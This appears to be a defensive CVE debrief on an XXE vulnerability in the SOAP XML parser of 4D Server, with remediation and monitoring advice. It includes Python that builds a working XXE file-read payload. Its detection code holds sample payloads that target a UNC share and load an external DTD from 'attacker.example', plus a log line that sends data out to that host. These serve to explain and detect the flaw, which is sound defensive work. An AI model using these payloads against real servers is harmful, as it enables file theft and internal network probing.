PatchSiren

PatchSiren cyber security CVE debrief

CVE-2024-39847 4D Server CVE debrief

CVE-2024-39847 is a high-severity vulnerability in the XML parser used by the SOAP endpoints of 4D Server. According to the NVD description, an unauthenticated attacker can abuse the weakness to read files on the application server and on adjacent network shares, and can make the server issue HTTP GET requests to arbitrary services. The CVE was published on 2026-04-30 and modified on 2026-05-17; track the issue by the published date and treat the modified date as a cue that the record changed after initial publication. The supplied NVD data scores the issue CVSS 8.7 (HIGH) and maps the vulnerable CPEs to 4D Server 20 r3, 20 r4, and 20 r6.

Vendor: 4D
Product: Server
CVSS: 8.7 (HIGH)
CISA KEV: not listed in the stored evidence
Original CVE published: 2026-04-30
Original CVE updated: 2026-05-17
Advisory published: 2026-04-30
Advisory updated: 2026-05-17

Who should care

Security and infrastructure teams responsible for 4D Server deployments, especially if SOAP endpoints are exposed to untrusted networks. Also relevant to teams that rely on adjacent file shares or backend services reachable from the application server.

Technical summary

The issue is mapped to CWE-611 (Improper Restriction of XML External Entity Reference, i.e. XXE). The NVD description places the weakness in the XML parser functionality used by the SOAP endpoints of 4D Server. In the general XXE pattern, the attacker sends XML whose DOCTYPE declares an entity with a SYSTEM identifier (a local file path, a UNC share path, or an http:// URL); when the parser expands that entity it fetches the target on the server's behalf and the content lands wherever the entity was referenced. The NVD wording matches that pattern: a file or share target gives local file and adjacent network share disclosure, and an http:// target gives server-side request abuse in the form of arbitrary HTTP GET requests. The record does not describe the exact request, and the "adjacent network shares" wording is consistent with UNC paths being resolved, which is a Windows host behaviour. NVD lists vulnerable CPE criteria for 4D Server 20 r3, 20 r4, and 20 r6.
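To make the CWE-611 mechanism concrete, the following is an added example written for this debrief (not code from 4D, and not taken from the NVD record) that pushes a constructed SOAP envelope carrying an XXE payload through Python's xml.sax parser twice: once with external general entity resolution switched on, which stands in for the permissive parser configuration the weakness describes, and once with it off, which is the hardened configuration. The target file, the GetRecord operation and the parser itself are assumptions for illustration; nothing here reproduces the actual 4D Server request.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed SOAP request carrying a classic XXE payload: the DOCTYPE declares an
# external entity whose SYSTEM identifier is a server-side file path, and the body
# references it inside an element the service will process or echo back.
SOAP_XXE_TEMPLATE = """<?xml version="1.0"?>
<!DOCTYPE Envelope [
  <!ENTITY xxe SYSTEM "{target}">
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetRecord><id>&xxe;</id></GetRecord>
  </soap:Body>
</soap:Envelope>
"""


class IdCollector(ContentHandler):
    """Collects the text of the <id> element, i.e. what the SOAP service would see."""

    def __init__(self):
        super().__init__()
        self.in_id = False
        self.id_text = []

    def startElement(self, name, attrs):
        self.in_id = name == "id"

    def endElement(self, name):
        if name == "id":
            self.in_id = False

    def characters(self, content):
        if self.in_id:
            self.id_text.append(content)


def parse_soap_id(envelope: bytes, resolve_external_entities: bool) -> str:
    """Parse a SOAP envelope and return the <id> text.

    resolve_external_entities=True mimics a parser left permissive (the CWE-611
    condition): SYSTEM entities are fetched and expanded. False is the hardened
    setting, in which the parser never resolves external entities.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = IdCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(envelope))
    return "".join(handler.id_text).strip()


def demo_xxe():
    """Run the same payload through the permissive and hardened parsers.

    Returns (leaked, safe): the <id> text each configuration produced.
    """
    # Constructed stand-in for a sensitive file on the application server.
    with tempfile.NamedTemporaryFile("w", suffix=".conf", delete=False) as f:
        f.write("db_password=constructed-secret\n")
        target = f.name
    try:
        envelope = SOAP_XXE_TEMPLATE.format(target=target).encode()
        leaked = parse_soap_id(envelope, resolve_external_entities=True)
        safe = parse_soap_id(envelope, resolve_external_entities=False)
        return leaked, safe
    finally:
        os.unlink(target)


if __name__ == "__main__":
    leaked, safe = demo_xxe()
    print("permissive parser saw:", repr(leaked))
    print("hardened parser saw:  ", repr(safe))
```

With the permissive setting the file content comes back as the value of `<id>`; with the hardened setting the entity reference expands to nothing. The server-side request variant is the same payload with an http:// URL as the SYSTEM identifier, left out here so the example runs offline. Python 3.7.1 and later default `feature_external_ges` to off, which is the setting a hardened parser should keep; whatever XML library a service uses, the check is the same: external entities and DTD loading disabled, and ideally any DOCTYPE rejected before parsing.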

Defensive priority

High. The combination of network reachability, unauthenticated attack surface, and potential access to files and internal services makes this a priority finding for exposed 4D Server instances.

Recommended defensive actions

  • Inventory 4D Server deployments and confirm whether versions 20 r3, 20 r4, or 20 r6 are in use. The supplied record lists only those releases; do not read the absence of other 20.x releases from the CPE list as confirmation that they are unaffected, confirm with the vendor.
  • Review whether SOAP endpoints are reachable from untrusted networks and restrict exposure where possible.
  • Apply vendor-provided remediation guidance from 4d.com and the linked third-party advisory.
  • Treat the issue as a potential file disclosure and server-side request abuse risk: review sensitive file locations and internal services reachable from the application server.
  • Monitor for abnormal SOAP requests, in particular request bodies that carry a DOCTYPE or ENTITY declaration (SOAP 1.1 and 1.2 messages must not contain a DTD, so a DOCTYPE at a SOAP endpoint is anomalous on its own), and for unexpected outbound HTTP GET activity from the server host, especially to internal addresses or to hosts it does not normally contact.
  • Validate that compensating controls such as network segmentation and least-privilege service access are in place while remediation is underway.
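A triage routine for the monitoring action above, as an added example that is not part of the original debrief: it scores captured SOAP request bodies for XXE indicators (DOCTYPE, SYSTEM/PUBLIC entities, external DTDs, parameter entities) and flags outbound GETs from the application server to destinations that are off an egress allow list. The request bodies, the log line format, the server address 10.20.30.40, the allow list and the attacker host are all constructed for the example; adapt the parsing to whatever your proxy or capture tooling actually emits.

```python
import ipaddress
import re
from urllib.parse import urlparse

# Indicators of XXE in an XML/SOAP request body. SOAP 1.1 and 1.2 forbid a Document
# Type Declaration in a message, so any DOCTYPE at a SOAP endpoint is anomalous;
# SYSTEM/PUBLIC entities and parameter entities are the constructs that turn it into
# file disclosure or server-side requests.
XXE_INDICATORS = {
    "doctype": re.compile(r"<!DOCTYPE\b", re.I),
    "external_entity": re.compile(r"<!ENTITY\s+(%\s*)?\w+\s+(SYSTEM|PUBLIC)\b", re.I),
    "external_dtd": re.compile(r"<!DOCTYPE\s+\w+\s+(SYSTEM|PUBLIC)\b", re.I),
    "parameter_entity": re.compile(r"<!ENTITY\s+%", re.I),
}


def score_soap_body(body):
    """Return the names of the XXE indicators present in one request body."""
    return [name for name, pat in XXE_INDICATORS.items() if pat.search(body)]


def triage_soap_bodies(records):
    """records: iterable of (request_id, body). Returns {request_id: indicators} for hits only."""
    hits = {}
    for request_id, body in records:
        found = score_soap_body(body)
        if found:
            hits[request_id] = found
    return hits


# Constructed sample: three SOAP bodies as a reverse proxy with body logging or a
# packet capture would hand them to an analyst. req-002 targets a UNC share path
# (the "adjacent network shares" case), req-003 stages a blind XXE via an external DTD.
SOAP_ENV = '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
SOAP_BODIES = [
    ("req-001", '<?xml version="1.0"?>' + SOAP_ENV +
                '<soap:Body><GetRecord><id>42</id></GetRecord></soap:Body></soap:Envelope>'),
    ("req-002", '<?xml version="1.0"?><!DOCTYPE Envelope [<!ENTITY xxe SYSTEM '
                '"\\\\fileserver\\finance\\payroll.csv">]>' + SOAP_ENV +
                '<soap:Body><GetRecord><id>&xxe;</id></GetRecord></soap:Body></soap:Envelope>'),
    ("req-003", '<?xml version="1.0"?><!DOCTYPE Envelope [<!ENTITY % dtd SYSTEM '
                '"http://attacker.example/evil.dtd"> %dtd;]>' + SOAP_ENV +
                '<soap:Body><GetRecord><id>1</id></GetRecord></soap:Body></soap:Envelope>'),
]

APP_SERVER_IP = "10.20.30.40"                    # constructed: the 4D Server host
EGRESS_ALLOWLIST = {"updates.example.internal"}  # constructed: destinations it legitimately calls


def triage_egress(lines):
    """Flag HTTP GETs from the app server to anything off the allow list.

    Each line is a constructed proxy/egress record: "<ts> <src_ip> <method> <url> <status>".
    Returns a list of (ts, url, reason).
    """
    findings = []
    for line in lines:
        parts = line.split()
        if len(parts) != 5:
            continue
        ts, src, method, url, _status = parts
        if src != APP_SERVER_IP or method != "GET":
            continue
        host = urlparse(url).hostname or ""
        if host in EGRESS_ALLOWLIST:
            continue
        try:
            ip = ipaddress.ip_address(host)
        except ValueError:
            reason = "GET to host outside the egress allow list"
        else:
            if ip.is_link_local:
                reason = "GET to link-local address (metadata-service style target)"
            elif ip.is_private:
                reason = "GET to internal address (server-side request pivot)"
            else:
                reason = "GET to public IP outside the egress allow list"
        findings.append((ts, url, reason))
    return findings


# Constructed egress log: one allowed fetch, three suspicious GETs from the app
# server, one request from a different host, and a POST that is out of scope.
EGRESS_LOG = [
    "2026-05-02T10:15:01Z 10.20.30.40 GET https://updates.example.internal/4d/manifest.json 200",
    "2026-05-02T10:15:07Z 10.20.30.40 GET http://169.254.169.254/latest/meta-data/ 200",
    "2026-05-02T10:15:09Z 10.20.30.40 GET http://10.20.30.55:8080/admin/ 401",
    "2026-05-02T10:15:12Z 10.20.30.40 GET http://attacker.example/c?d=cGF5cm9sbA 200",
    "2026-05-02T10:16:00Z 10.20.30.77 GET http://attacker.example/ 200",
    "2026-05-02T10:16:05Z 10.20.30.40 POST https://updates.example.internal/telemetry 204",
]


if __name__ == "__main__":
    for request_id, indicators in triage_soap_bodies(SOAP_BODIES).items():
        print(request_id, "->", ", ".join(indicators))
    for ts, url, reason in triage_egress(EGRESS_LOG):
        print(ts, url, "->", reason)
```

The body check deliberately fires on a bare DOCTYPE as well as on the dangerous entity forms, because a legitimate SOAP client has no reason to send one; tune the egress side by replacing the allow list with the destinations the server is actually expected to reach, and treat a GET to a link-local or internal address immediately after a flagged SOAP request as the strongest pairing of the two signals.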

Evidence notes

All substantive claims in this debrief are drawn from the supplied NVD record and its listed references. The NVD entry states the vulnerability affects SOAP endpoint XML parser functionality in 4D Server and allows unauthenticated file read access and arbitrary HTTP GET requests. The record includes CVSS 8.7 HIGH, CWE-611, and vulnerable CPE criteria for 4D Server 20 r3, 20 r4, and 20 r6. The CVE was published on 2026-04-30 and modified on 2026-05-17. No KEV entry or ransomware-campaign attribution was supplied.

Official resources

Publicly disclosed in the supplied CVE/NVD record on 2026-04-30; NVD modified the entry on 2026-05-17.